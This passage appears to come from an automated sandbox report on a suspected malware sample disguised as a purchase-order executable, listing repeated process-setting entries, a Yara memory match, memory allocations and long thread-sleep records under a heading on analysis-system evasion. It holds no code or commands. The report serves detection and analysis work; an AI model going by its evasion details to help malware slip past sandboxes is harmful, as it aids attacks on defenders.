                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 9150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 79F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: A150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: B150000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMemory allocated: 2790000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599749Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599589Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 599016Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598891Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598782Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598657Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598532Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598422Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598188Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 598063Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597813Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597703Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597247Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596344Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596235Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 596110Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595985Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595141Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 595031Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594922Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594812Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594703Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594594Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594359Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594250Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeThread delayed: delay time: 594141Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5885Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3848Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeWindow / User API: threadDelayed 2053Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeWindow / User API: threadDelayed 7788Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeWindow / User API: foregroundWindowGot 1742Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 1620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -23980767295822402s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7480Thread sleep count: 2053 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599749s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7480Thread sleep count: 7788 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599589s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599250s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599141s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -599016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598782s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -598063s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597703s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597359s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597247s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597141s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -597031s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -596110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe TID: 7476Thread sleep time: -595985s >= -30000sJump to behavior
